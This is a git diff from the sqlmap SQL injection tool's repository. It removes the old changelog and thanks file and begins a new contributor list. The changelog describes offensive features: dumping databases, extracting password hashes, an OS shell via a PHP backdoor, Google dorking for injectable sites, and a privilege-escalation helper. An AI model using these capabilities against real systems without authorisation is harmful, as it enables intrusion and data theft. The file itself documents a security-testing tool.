but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
GNU General Public License for more details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License
|
|
||||||
along with this program; if not, write to the Free Software
|
|
||||||
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
|
|
||||||
|
|
||||||
Also add information on how to contact you by electronic and paper mail.
|
|
||||||
|
|
||||||
If the program is interactive, make it output a short notice like this
|
|
||||||
when it starts in an interactive mode:
|
|
||||||
|
|
||||||
Gnomovision version 69, Copyright (C) year name of author
|
|
||||||
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
|
||||||
This is free software, and you are welcome to redistribute it
|
|
||||||
under certain conditions; type `show c' for details.
|
|
||||||
|
|
||||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
|
||||||
parts of the General Public License. Of course, the commands you use may
|
|
||||||
be called something other than `show w' and `show c'; they could even be
|
|
||||||
mouse-clicks or menu items--whatever suits your program.
|
|
||||||
|
|
||||||
You should also get your employer (if you work as a programmer) or your
|
|
||||||
school, if any, to sign a "copyright disclaimer" for the program, if
|
|
||||||
necessary. Here is a sample; alter the names:
|
|
||||||
|
|
||||||
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
|
|
||||||
`Gnomovision' (which makes passes at compilers) written by James Hacker.
|
|
||||||
|
|
||||||
<signature of Ty Coon>, 1 April 1989
|
|
||||||
Ty Coon, President of Vice
|
|
||||||
|
|
||||||
This General Public License does not permit incorporating your program into
|
|
||||||
proprietary programs. If your program is a subroutine library, you may
|
|
||||||
consider it more useful to permit linking proprietary applications with the
|
|
||||||
library. If this is what you want to do, use the GNU Library General
|
|
||||||
Public License instead of this License.
|
|
||||||
|
|||||||
323
doc/ChangeLog
323
doc/ChangeLog
@@ -1,323 +0,0 @@
|
|||||||
sqlmap (0.6.4-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Minor enhancement to support an option (--is-dba) to show if the
|
|
||||||
current user is a database management system administrator;
|
|
||||||
* Major bug fix to avoid tracebacks when multiple targets are specified
|
|
||||||
and one of them is not reachable;
|
|
||||||
* Minor bug fix to make the --postfix work even if --prefix is not
|
|
||||||
provided;
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Day, DD MMM 2009 10:00:00 +0000
|
|
||||||
|
|
||||||
sqlmap (0.6.3-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Major enhancement to get list of targets to test from Burp proxy
|
|
||||||
(http://portswigger.net/suite/) requests log file path or WebScarab
|
|
||||||
proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
|
|
||||||
'conversations/' folder path by providing option -l <filepath>;
|
|
||||||
* Major enhancement to support Partial UNION query SQL injection
|
|
||||||
technique too;
|
|
||||||
* Major enhancement to test if the web application technology supports
|
|
||||||
stacked queries (multiple statements) by providing option
|
|
||||||
--stacked-test which will be then used someday also by takeover
|
|
||||||
functionality;
|
|
||||||
* Major enhancement to test if the injectable parameter is affected by
|
|
||||||
a time based blind SQL injection technique by providing option
|
|
||||||
--time-test;
|
|
||||||
* Minor enhancement to fingerprint the web server operating system and
|
|
||||||
the web application technology by parsing some HTTP response headers;
|
|
||||||
* Minor enhancement to fingerprint the back-end DBMS operating system by
|
|
||||||
parsing the DBMS banner value when -b option is provided;
|
|
||||||
* Minor enhancement to be able to specify the number of seconds before
|
|
||||||
timeout the connection by providing option --timeout #, default is set
|
|
||||||
to 10 seconds and must be 3 or higher;
|
|
||||||
* Minor enhancement to be able to specify the number of seconds to wait
|
|
||||||
between each HTTP request by providing option --delay #;
|
|
||||||
* Minor enhancement to be able to get the injection payload --prefix and
|
|
||||||
--postfix from user;
|
|
||||||
* Minor enhancement to be able to enumerate table columns and dump table
|
|
||||||
entries, also when the database name is not provided, by using the
|
|
||||||
current database on MySQL and Microsoft SQL Server, the 'public'
|
|
||||||
scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
|
|
||||||
* Minor enhancemet to support also --regexp, --excl-str and --excl-reg
|
|
||||||
options rather than only --string when comparing HTTP responses page
|
|
||||||
content;
|
|
||||||
* Minor enhancement to be able to specify extra HTTP headers by providing
|
|
||||||
option --headers. By default Accept, Accept-Language and Accept-Charset
|
|
||||||
headers are set;
|
|
||||||
* Minor improvement to be able to provide CU (as current user) as user
|
|
||||||
value (-U) when enumerating users privileges or users passwords;
|
|
||||||
* Minor improvements to sqlmap Debian package files;
|
|
||||||
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
|
|
||||||
library if available to speed up the sqlmap algorithmic operations;
|
|
||||||
* Minor improvement to retry the HTTP request up to three times in case
|
|
||||||
an exception is raised during the connection to the target url;
|
|
||||||
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
|
|
||||||
* Major bug fix so that when the user provide a SELECT statement to be
|
|
||||||
processed with an asterisk as columns, now it also work if in the FROM
|
|
||||||
there is no database name specified;
|
|
||||||
* Minor bug fix to correctly dump table entries when the column is
|
|
||||||
provided;
|
|
||||||
* Minor bug fix to correctly handle session.error, session.timeout and
|
|
||||||
httplib.BadStatusLine exceptions in HTTP requests;
|
|
||||||
* Minor bug fix to correctly catch connection exceptions and notify to
|
|
||||||
the user also if they occur within a thread;
|
|
||||||
* Increased default output level from 0 to 1;
|
|
||||||
* Updated documentation.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Thu, 18 Dec 2008 10:00:00 +0000
|
|
||||||
|
|
||||||
sqlmap (0.6.2-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Major bug fix to correctly dump tables entries when --stop is not
|
|
||||||
specified;
|
|
||||||
* Major bug fix so that the users' privileges enumeration now works
|
|
||||||
properly also on both MySQL < 5.0 and MySQL >= 5.0;
|
|
||||||
* Major bug fix when the request is POST to also send the GET parameters
|
|
||||||
if any have been provided;
|
|
||||||
* Major bug fix to correctly update sqlmap to the latest stable release
|
|
||||||
with command line --update;
|
|
||||||
* Major bug fix so that when the expected value of a query (count
|
|
||||||
variable) is an integer and, for some reasons, its resumed value from
|
|
||||||
the session file is a string or a binary file, the query is executed
|
|
||||||
again and its new output saved to the session file;
|
|
||||||
* Minor bug fix in MySQL comment injection fingerprint technique;
|
|
||||||
* Minor improvement to correctly enumerate tables, columns and dump
|
|
||||||
tables entries on Oracle and on PostgreSQL when the database name is
|
|
||||||
not 'public' schema or a system database;
|
|
||||||
* Minor improvement to be able to dump entries on MySQL < 5.0 when
|
|
||||||
database name, table name and column(s) are provided;
|
|
||||||
* Updated the database management system fingerprint checks to correctly
|
|
||||||
identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
|
|
||||||
* More user-friendly warning messages.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sun, 2 Nov 2008 19:00:00 +0000
|
|
||||||
|
|
||||||
sqlmap (0.6.1-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Major bug fix to blind SQL injection bisection algorithm to handle an
|
|
||||||
exception;
|
|
||||||
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
|
|
||||||
* Implemented possibility to test for and inject also on LIKE
|
|
||||||
statements;
|
|
||||||
* Implemented --start and --stop options to set the first and the last
|
|
||||||
table entry to dump;
|
|
||||||
* Added non-interactive/batch-mode (--batch) option to make it easy to
|
|
||||||
wrap sqlmap in Metasploit and any other tool;
|
|
||||||
* Minor enhancement to save also the length of query output in the
|
|
||||||
session file when retrieving the query output length for ETA or for
|
|
||||||
resume purposes;
|
|
||||||
* Changed the order sqlmap dump table entries from column by column to
|
|
||||||
row by row. Now it also dumps entries as they are stored in the tables,
|
|
||||||
not forcing the entries' order alphabetically anymore;
|
|
||||||
* Minor bug fix to correctly handle parameters' value with % character.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Fri, 20 Oct 2008 10:00:00 +0000
|
|
||||||
|
|
||||||
sqlmap (0.6-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Complete code refactor and many bugs fixed;
|
|
||||||
* Added multithreading support to set the maximum number of concurrent
|
|
||||||
HTTP requests;
|
|
||||||
* Implemented SQL shell (--sql-shell) functionality and fixed SQL query
|
|
||||||
(--sql-query, before called -e) to be able to run whatever SELECT
|
|
||||||
statement and get its output in both inband and blind SQL injection
|
|
||||||
attack;
|
|
||||||
* Added an option (--privileges) to retrieve DBMS users privileges, it
|
|
||||||
also notifies if the user is a DBMS administrator;
|
|
||||||
* Added support (-c) to read options from configuration file, an example
|
|
||||||
of valid INI file is sqlmap.conf and support (--save) to save command
|
|
||||||
line options on a configuration file;
|
|
||||||
* Created a function that updates the whole sqlmap to the latest stable
|
|
||||||
version available by running sqlmap with --update option;
|
|
||||||
* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
|
|
||||||
installation binary packages;
|
|
||||||
* Created sqlmap .exe (Windows) portable executable;
|
|
||||||
* Save a lot of more information to the session file, useful when
|
|
||||||
resuming injection on the same target to not loose time on identifying
|
|
||||||
injection, UNION fields and back-end DBMS twice or more times;
|
|
||||||
* Improved automatic check for parenthesis when testing and forging SQL
|
|
||||||
query vector;
|
|
||||||
* Now it checks for SQL injection on all GET/POST/Cookie parameters then
|
|
||||||
it lets the user select which parameter to perform the injection on in
|
|
||||||
case that more than one is injectable;
|
|
||||||
* Implemented support for HTTPS requests over HTTP(S) proxy;
|
|
||||||
* Added a check to handle NULL or not available queries output;
|
|
||||||
* More entropy (randomStr() and randomInt() functions in
|
|
||||||
lib/core/common.py) in inband SQL injection concatenated query and in
|
|
||||||
AND condition checks;
|
|
||||||
* Improved XML files structure;
|
|
||||||
* Implemented the possibility to change the HTTP Referer header;
|
|
||||||
* Added support to resume from session file also when running with
|
|
||||||
inband SQL injection attack;
|
|
||||||
* Added an option (--os-shell) to execute operating system commands if
|
|
||||||
the back-end DBMS is MySQL, the web server has the PHP engine active
|
|
||||||
and permits write access on a directory within the document root;
|
|
||||||
* Added a check to assure that the provided string to match (--string)
|
|
||||||
is within the page content;
|
|
||||||
* Fixed various queries in XML file;
|
|
||||||
* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
|
|
||||||
the library to parse it;
|
|
||||||
* Fixed password fetching function, mainly for Microsoft SQL Server and
|
|
||||||
reviewed the password hashes parsing function;
|
|
||||||
* Major bug fixed to avoid tracebacks when the testable parameter(s) is
|
|
||||||
dynamic, but not injectable;
|
|
||||||
* Enhanced logging system: added three more levels of verbosity to show
|
|
||||||
also HTTP sent and received traffic;
|
|
||||||
* Enhancement to handle Set-Cookie from target url and automatically
|
|
||||||
re-establish the Session when it expires;
|
|
||||||
* Added support to inject also on Set-Cookie parameters;
|
|
||||||
* Implemented TAB completion and command history on both --sql-shell and
|
|
||||||
--os-shell;
|
|
||||||
* Renamed some command line options;
|
|
||||||
* Added a conversion library;
|
|
||||||
* Added code schema and reminders for future developments;
|
|
||||||
* Added Copyright comment and $Id$;
|
|
||||||
* Updated the command line layout and help messages;
|
|
||||||
* Updated some docstrings;
|
|
||||||
* Updated documentation files.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Mon, 1 Sep 2008 10:00:00 +0100
|
|
||||||
|
|
||||||
sqlmap (0.5-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Added support for Oracle database management system
|
|
||||||
* Extended inband SQL injection functionality (--union-use) to all
|
|
||||||
other possible queries since it only worked with -e and --file on
|
|
||||||
all DMBS plugins;
|
|
||||||
* Added support to extract database users password hash on Microsoft
|
|
||||||
SQL Server;
|
|
||||||
* Added a fuzzer function with the aim to parse HTML page looking
|
|
||||||
for standard database error messages consequently improving
|
|
||||||
database fingerprinting;
|
|
||||||
* Added support for SQL injection on HTTP Cookie and User-Agent headers;
|
|
||||||
* Reviewed HTTP request library (lib/request.py) to support the
|
|
||||||
extended inband SQL injection functionality. Splitted getValue()
|
|
||||||
into getInband() and getBlind();
|
|
||||||
* Major enhancements in common library and added checkForBrackets()
|
|
||||||
method to check if the bracket(s) are needed to perform a UNION query
|
|
||||||
SQL injection attack;
|
|
||||||
* Implemented --dump-all functionality to dump entire DBMS data from
|
|
||||||
all databases tables;
|
|
||||||
* Added support to exclude DBMS system databases' when enumeration
|
|
||||||
tables and dumping their entries (--exclude-sysdbs);
|
|
||||||
* Implemented in Dump.dbTableValues() method the CSV file dumped data
|
|
||||||
automatic saving in csv/ folder by default;
|
|
||||||
* Added DB2, Informix and Sybase DBMS error messages and minor
|
|
||||||
improvements in xml/errors.xml;
|
|
||||||
* Major improvement in all three DBMS plugins so now sqlmap does not
|
|
||||||
get entire databases' tables structure when all of database/table/
|
|
||||||
column are specified to be dumped;
|
|
||||||
* Important fixes in lib/option.py to make sqlmap properly work also
|
|
||||||
with python 2.5 and handle the CSV dump files creation work also
|
|
||||||
under Windows operating system, function __setCSVDir() and fixed
|
|
||||||
also in lib/dump.py;
|
|
||||||
* Minor enhancement in lib/injection.py to randomize the number
|
|
||||||
requested to test the presence of a SQL injection affected parameter
|
|
||||||
and implemented the possibilities to break (q) the for cycle when
|
|
||||||
using the google dork option (-g);
|
|
||||||
* Minor fix in lib/request.py to properly encode the url to request
|
|
||||||
in case the "fixed" part of the url has blank spaces;
|
|
||||||
* More minor layout enhancements in some libraries;
|
|
||||||
* Renamed DMBS plugins;
|
|
||||||
* Complete code refactoring, a lot of minor and some major fixes in
|
|
||||||
libraries, many minor improvements;
|
|
||||||
* Updated all documentation files.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sun, 4 Nov 2007 20:00:00 +0100
|
|
||||||
|
|
||||||
sqlmap (0.4-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Added DBMS fingerprint based also upon HTML error messages parsing
|
|
||||||
defined in lib/parser.py which reads an XML file defining default
|
|
||||||
error messages for each supported DBMS;
|
|
||||||
* Added Microsoft SQL Server extensive DBMS fingerprint checks based
|
|
||||||
upon accurate '@@version' parsing matching on an XML file to get also
|
|
||||||
the exact patching level of the DBMS;
|
|
||||||
* Added support for query ETA (Estimated Time of Arrival) real time
|
|
||||||
calculation (--eta);
|
|
||||||
* Added support to extract database management system users password
|
|
||||||
hash on MySQL and PostgreSQL (--passwords);
|
|
||||||
* Added docstrings to all functions, classes and methods, consequently
|
|
||||||
released the sqlmap development documentation
|
|
||||||
<http://sqlmap.sourceforge.net/dev/>;
|
|
||||||
* Implemented Google dorking feature (-g) to take advantage of Google
|
|
||||||
results affected by SQL injection to perform other command line
|
|
||||||
argument on their DBMS;
|
|
||||||
* Improved logging functionality: passed from banal 'print' to Python
|
|
||||||
native logging library;
|
|
||||||
* Added support for more than one parameter in '-p' command line
|
|
||||||
option;
|
|
||||||
* Added support for HTTP Basic and Digest authentication methods
|
|
||||||
(--basic-auth and --digest-auth);
|
|
||||||
* Added the command line option '--remote-dbms' to manually specify
|
|
||||||
the remote DBMS;
|
|
||||||
* Major improvements in union.UnionCheck() and union.UnionUse()
|
|
||||||
functions to make it possible to exploit inband SQL injection also
|
|
||||||
with database comment characters ('--' and '#') in UNION query
|
|
||||||
statements;
|
|
||||||
* Added the possibility to save the output into a file while performing
|
|
||||||
the queries (-o OUTPUTFILE) so it is possible to stop and resume the
|
|
||||||
same query output retrieving in a second time (--resume);
|
|
||||||
* Added support to specify the database table column to enumerate
|
|
||||||
(-C COL);
|
|
||||||
* Added inband SQL injection (UNION query) support (--union-use);
|
|
||||||
* Complete code refactoring, a lot of minor and some major fixes in
|
|
||||||
libraries, many minor improvements;
|
|
||||||
* Reviewed the directory tree structure;
|
|
||||||
* Splitted lib/common.py: inband injection functionalities now are
|
|
||||||
moved to lib/union.py;
|
|
||||||
* Updated documentation files.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Fri, 15 Jun 2007 20:00:00 +0100
|
|
||||||
|
|
||||||
sqlmap (0.3-1) stable; urgency=low
|
|
||||||
|
|
||||||
* Added module for MS SQL Server;
|
|
||||||
* Strongly improved MySQL dbms active fingerprint and added MySQL
|
|
||||||
comment injection check;
|
|
||||||
* Added PostgreSQL dbms active fingerprint;
|
|
||||||
* Added support for string match (--string);
|
|
||||||
* Added support for UNION check (--union-check);
|
|
||||||
* Removed duplicated code, delegated most of features to the engine
|
|
||||||
in common.py and option.py;
|
|
||||||
* Added support for --data command line argument to pass the string
|
|
||||||
for POST requests;
|
|
||||||
* Added encodeParams() method to encode url parameters before making
|
|
||||||
http request;
|
|
||||||
* Many bug fixes;
|
|
||||||
* Rewritten documentation files;
|
|
||||||
* Complete code restyling.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Sat, 20 Jan 2007 20:00:00 +0100
|
|
||||||
|
|
||||||
sqlmap (0.2-1) stable; urgency=low
|
|
||||||
|
|
||||||
* complete refactor of entire program;
|
|
||||||
* added TODO and THANKS files;
|
|
||||||
* added some papers references in README file;
|
|
||||||
* moved headers to user-agents.txt, now -f parameter specifies a file
|
|
||||||
(user-agents.txt) and randomize the selection of User-Agent header;
|
|
||||||
* strongly improved program plugins (mysqlmap.py and postgres.py),
|
|
||||||
major enhancements:
|
|
||||||
* improved active mysql fingerprint check_dbms();
|
|
||||||
* improved enumeration functions for both databases;
|
|
||||||
* minor changes in the unescape() functions;
|
|
||||||
* replaced old inference algorithm with a new bisection algorithm.
|
|
||||||
* reviewed command line parameters, now with -p it's possible to
|
|
||||||
specify the parameter you know it's vulnerable to sql injection,
|
|
||||||
this way the script won't perform the sql injection checks itself;
|
|
||||||
removed the TOKEN parameter;
|
|
||||||
* improved Common class, adding support for http proxy and http post
|
|
||||||
method in hash_page;
|
|
||||||
* added OptionCheck class in option.py which performs all needed checks
|
|
||||||
on command line parameters and values;
|
|
||||||
* added InjectionCheck class in injection.py which performs check on
|
|
||||||
url stability, dynamics of parameters and injection on dynamic url
|
|
||||||
parameters;
|
|
||||||
* improved output methods in dump.py;
|
|
||||||
* layout enhancement on main program file (sqlmap.py), adapted to call
|
|
||||||
new option/injection classes and improvements on catching of
|
|
||||||
exceptions.
|
|
||||||
|
|
||||||
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Wed, 13 Dec 2006 20:00:00 +0100
|
|
||||||
BIN
doc/FAQ.pdf
Normal file
BIN
doc/FAQ.pdf
Normal file
Binary file not shown.
4311
doc/README.html
4311
doc/README.html
File diff suppressed because it is too large
Load Diff
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
4191
doc/README.sgml
4191
doc/README.sgml
File diff suppressed because it is too large
Load Diff
163
doc/THANKS
163
doc/THANKS
@@ -1,163 +0,0 @@
|
|||||||
== Individuals ==
|
|
||||||
|
|
||||||
Chip Andrews <chip@sqlsecurity.com>
|
|
||||||
for his excellent work maintaining the SQL Server versions database
|
|
||||||
at SQLSecurity.com and permission to implement the update feature
|
|
||||||
taking data from his site
|
|
||||||
|
|
||||||
Jack Butler <fattredd@hotmail.com>
|
|
||||||
for providing me with the sqlmap site favicon
|
|
||||||
|
|
||||||
Karl Chen <quarl@cs.berkeley.edu>
|
|
||||||
for providing with the multithreading patch for the inference
|
|
||||||
algorithm
|
|
||||||
|
|
||||||
Pierre Chifflier <pollux@debian.org>
|
|
||||||
for uploading the sqlmap 0.6.2 Debian package to the official Debian
|
|
||||||
project repository
|
|
||||||
|
|
||||||
Stefano Di Paola <stefano.dipaola@wisec.it>
|
|
||||||
for suggesting good features
|
|
||||||
|
|
||||||
Adam Faheem <faheem.adam@is.co.za>
|
|
||||||
for reporting a few bugs
|
|
||||||
|
|
||||||
Jim Forster <jimforster@goldenwest.com>
|
|
||||||
for reporting a bug
|
|
||||||
|
|
||||||
Rong-En Fan <rafan@freebsd.org>
|
|
||||||
for commiting the sqlmap 0.5 port to the official FreeBSD project
|
|
||||||
repository
|
|
||||||
|
|
||||||
Giorgio Fedon <giorgio.fedon@gmail.com>
|
|
||||||
for suggesting a speed improvement for bisection algorithm
|
|
||||||
for reporting a bug when running against Microsoft SQL Server 2005
|
|
||||||
|
|
||||||
Ivan Giacomelli <truemilk@insiberia.net>
|
|
||||||
for reporting a bug
|
|
||||||
for suggesting a minor enhancement
|
|
||||||
for reviewing the documentation
|
|
||||||
|
|
||||||
Davide Guerri <d.guerri@caspur.it>
|
|
||||||
for suggesting an enhancement
|
|
||||||
|
|
||||||
Kristian Erik Hermansen <kristian.hermansen@gmail.com>
|
|
||||||
for reporting a bug
|
|
||||||
for donating to sqlmap development
|
|
||||||
|
|
||||||
Jorge Hoya <aquinadie@gmail.com>
|
|
||||||
for suggesting a minor enhancement
|
|
||||||
|
|
||||||
Will Holcomb <wholcomb@gmail.com>
|
|
||||||
for his MultipartPostHandler class to handle multipart POST forms and
|
|
||||||
permission to include it within sqlmap source code
|
|
||||||
|
|
||||||
Luke Jahnke <luke.jahnke@gmail.com>
|
|
||||||
for reporting a bug when running against MySQL < 5.0
|
|
||||||
|
|
||||||
Anant Kochhar <anant.kochhar@secureyes.net>
|
|
||||||
for providing me with feedback on the user's manual
|
|
||||||
|
|
||||||
Nico Leidecker <nico@leidecker.info>
|
|
||||||
for providing me with feedback on a few features
|
|
||||||
|
|
||||||
Pavol Luptak <pavol.luptak@nethemba.com>
|
|
||||||
for reporting a bug when injecting on a POST data parameter
|
|
||||||
|
|
||||||
Michael Majchrowicz <mmajchrowicz@gmail.com>
|
|
||||||
for extensively beta-testing sqlmap on various MySQL DBMS
|
|
||||||
for providing really appreciated feedback
|
|
||||||
for suggesting a lot of ideas and features
|
|
||||||
|
|
||||||
Ferruh Mavituna <ferruh@mavituna.com>
|
|
||||||
for providing me with ideas on the implementation on a couple of
|
|
||||||
new features
|
|
||||||
|
|
||||||
Enrico Milanese <enricomilanese@gmail.com>
|
|
||||||
for reporting a bugs when using (-a) a single line User-Agent file
|
|
||||||
for providing me with some ideas for the PHP backdoor
|
|
||||||
|
|
||||||
Roberto Nemirovsky <roberto.paes@gmail.com>
|
|
||||||
for pointing me out some enhancements
|
|
||||||
|
|
||||||
Antonio Parata <s4tan@ictsc.it>
|
|
||||||
for providing me with some ideas for the PHP backdoor
|
|
||||||
|
|
||||||
Chris Patten <cpatten@sunera.com>
|
|
||||||
for reporting a bug in the blind SQL injection bisection algorithm
|
|
||||||
|
|
||||||
Adam Pridgen <adam.pridgen@gmail.com>
|
|
||||||
for suggesting some features
|
|
||||||
|
|
||||||
Alberto Revelli <r00t@northernfortress.net>
|
|
||||||
for inspiring me to write sqlmap user's manual in SGML
|
|
||||||
for his great Microsoft SQL Server take over tool, sqlninja,
|
|
||||||
http://sqlninja.sourceforge.net
|
|
||||||
|
|
||||||
Andres Riancho <andres.riancho@gmail.com>
|
|
||||||
for beta-testing sqlmap
|
|
||||||
for reporting a bug and suggesting some features
|
|
||||||
for including sqlmap in his great web application audit and attack
|
|
||||||
framework, w3af, http://w3af.sourceforge.net
|
|
||||||
|
|
||||||
Antonio Riva <antonio.riva@gmail.com>
|
|
||||||
for reporting a bug when running with python 2.5
|
|
||||||
|
|
||||||
Richard Safran <allapplyhere@yahoo.com>
|
|
||||||
for donating the sqlmap.org domain control
|
|
||||||
|
|
||||||
Tomoyuki Sakurai <cherry@trombik.org>
|
|
||||||
for submitting to the FreeBSD project the sqlmap 0.5 port
|
|
||||||
|
|
||||||
Philippe A. R. Schaeffer <schaeff@compuphil.de>
|
|
||||||
for reporting a minor bug
|
|
||||||
|
|
||||||
Sven Schluter <sschlueter@netzwerk.cc>
|
|
||||||
for providing with a patch for waiting a number of seconds between
|
|
||||||
each HTTP request
|
|
||||||
|
|
||||||
M Simkin <mlsimkin@cox.net>
|
|
||||||
for suggesting a feature
|
|
||||||
|
|
||||||
Jason Swan <jasoneswan@gmail.com>
|
|
||||||
for reporting a bug when enumerating columns on Microsoft SQL Server
|
|
||||||
for suggesting a couple of improvements
|
|
||||||
|
|
||||||
Alessandro Tanasi <alessandro@tanasi.it>
|
|
||||||
for extensively beta-testing sqlmap
|
|
||||||
for suggesting many features and reporting some bugs
|
|
||||||
for reviewing the documentation
|
|
||||||
|
|
||||||
Efrain Torres <et@metasploit.com>
|
|
||||||
for helping me out to improve the Metasploit Framework 3 sqlmap
|
|
||||||
auxiliary module and for commiting it on the Metasploit official
|
|
||||||
Subversion repository
|
|
||||||
for his great Metasploit WMAP Framework
|
|
||||||
|
|
||||||
Sandro Tosi <matrixhasu@gmail.com>
|
|
||||||
for helping to create sqlmap Debian package correctly
|
|
||||||
|
|
||||||
Bedirhan Urgun <bedirhanurgun@gmail.com>
|
|
||||||
for reporting a few bugs
|
|
||||||
for suggesting some features and improvements
|
|
||||||
for benchmarking sqlmap in the context of his SQL injection
|
|
||||||
benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
|
|
||||||
|
|
||||||
Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
|
|
||||||
for reporting an unhandled connection exception
|
|
||||||
|
|
||||||
fufuh <fufuh@users.sourceforge.net>
|
|
||||||
for reporting a bug when running on Windows
|
|
||||||
|
|
||||||
mariano <marianoso@gmail.com>
|
|
||||||
for reporting a bug
|
|
||||||
|
|
||||||
Sylphid <sylphid.su@sti.com.tw>
|
|
||||||
for suggesting some features
|
|
||||||
|
|
||||||
|
|
||||||
== Organizations ==
|
|
||||||
|
|
||||||
OWASP Board <http://www.owasp.org>
|
|
||||||
for sponsoring part of the sqlmap development in the context of OWASP
|
|
||||||
Spring of Code 2007
|
|
||||||
799
doc/THANKS.md
Normal file
799
doc/THANKS.md
Normal file
@@ -0,0 +1,799 @@
|
|||||||
|
# Individuals
|
||||||
|
|
||||||
|
Andres Tarasco Acuna, <atarasco(at)gmail.com>
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Santiago Accurso, <saccurso(at)skygear.com.ar>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Syed Afzal, <syed(at)syedafzal.in>
|
||||||
|
* for contributing a WAF script varnish.py
|
||||||
|
|
||||||
|
Zaki Akhmad, <zakiakhmad(at)gmail.com>
|
||||||
|
* for suggesting a couple of features
|
||||||
|
|
||||||
|
Olu Akindeinde, <seyi.akin(at)gmail.com>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
David Alvarez, <david.alvarez.s(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Sergio Alves, <sergioalexandre.alves(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Thomas Anderson, <darkc0de(at)live.com.ph>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Chip Andrews, <chip(at)sqlsecurity.com>
|
||||||
|
* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
|
||||||
|
|
||||||
|
Smith Andy, <teh.one(at)hotmail.com>
|
||||||
|
* for suggesting a feature
|
||||||
|
|
||||||
|
Otavio Augusto, <otavioarj(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Simon Baker, <simonb(at)sec-1.com>
|
||||||
|
* for reporting some bugs
|
||||||
|
|
||||||
|
Ryan Barnett, <RBarnett(at)trustwave.com>
|
||||||
|
* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
|
||||||
|
|
||||||
|
Emiliano Bazaes, <emiliano(at)7espejos.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Daniele Bellucci, <daniele.bellucci(at)gmail.com>
|
||||||
|
* for starting sqlmap project and developing it between July and August 2006
|
||||||
|
|
||||||
|
Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
|
||||||
|
* for contributing the DB2 support initial patch: fingerprint and enumeration
|
||||||
|
|
||||||
|
Anthony Boynes, <aboynes(at)gmail.com>
|
||||||
|
* for reporting several bugs
|
||||||
|
|
||||||
|
Marcelo Toscani Brandao
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Velky Brat, <velkybrat(at)gmail.com>
|
||||||
|
* for suggesting a minor enhancement to the bisection algorithm
|
||||||
|
|
||||||
|
James Briggs, <james.briggs(at)ngssecure.com>
|
||||||
|
* for suggesting a minor enhancement
|
||||||
|
|
||||||
|
Gianluca Brindisi, <g(at)brindi.si>
|
||||||
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
|
Jack Butler, <fattredd(at)hotmail.com>
|
||||||
|
* for contributing the sqlmap site favicon
|
||||||
|
|
||||||
|
Ulisses Castro, <uss.thebug(at)gmail.com>
|
||||||
|
* for reporting a bug
|
||||||
|
|
||||||
|
Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Cesar Cerrudo, <cesar(at)argeniss.com>
|
||||||
|
* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
|
||||||
|
|
||||||
|
Karl Chen, <quarl(at)cs.berkeley.edu>
|
||||||
|
* for contributing the initial multi-threading patch for the inference algorithm
|
||||||
|
|
||||||
|
Y P Chien, <ypchien(at)cox.net>
|
||||||
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
|
||||||
|
* for uploading and accepting the sqlmap Debian package to the official Debian project repository
|
||||||
|
|
||||||
|
